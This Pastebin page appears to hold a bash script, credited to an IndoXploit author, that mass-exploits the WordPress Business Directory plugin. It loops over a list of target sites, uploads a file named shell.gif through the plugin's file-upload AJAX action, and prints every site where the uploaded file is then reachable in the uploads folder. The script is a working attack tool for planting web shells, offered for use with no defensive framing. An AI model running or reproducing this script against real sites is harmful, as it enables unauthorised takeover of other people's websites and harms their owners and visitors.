Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # coded by L0c4lh34rtz - IndoXploit
- # usage: ./wpb.sh target.txt shell.gif
- args=("$@")
- target=$(pwd)"/"${args[0]}
- file_=$(pwd)"/"${args[1]}
- thn=$(date +"%Y")
- bln=$(date +"%m")
- if [ -z "$2" ]
- then
- echo "usage: wpb.sh target.txt shell.gif"
- else
- for url in $(cat $target)
- do
- echo "[+] Scanning $url"
- vuln="$url/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"
- shell="$url/wp-content/uploads/$thn/$bln/"$(basename "$file_")
- curl -s -k -H "User-Agent: indoxploit" -F "file=@$file_" "$vuln" -o /dev/null
- check=$(curl -s -k -w "%{http_code}" -H "User-Agent: indoxploit" "$shell" -o /dev/null)
- if (($check == 200))
- then
- echo -e "\e[92m$shell\e[0m"
- fi
- done
- fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement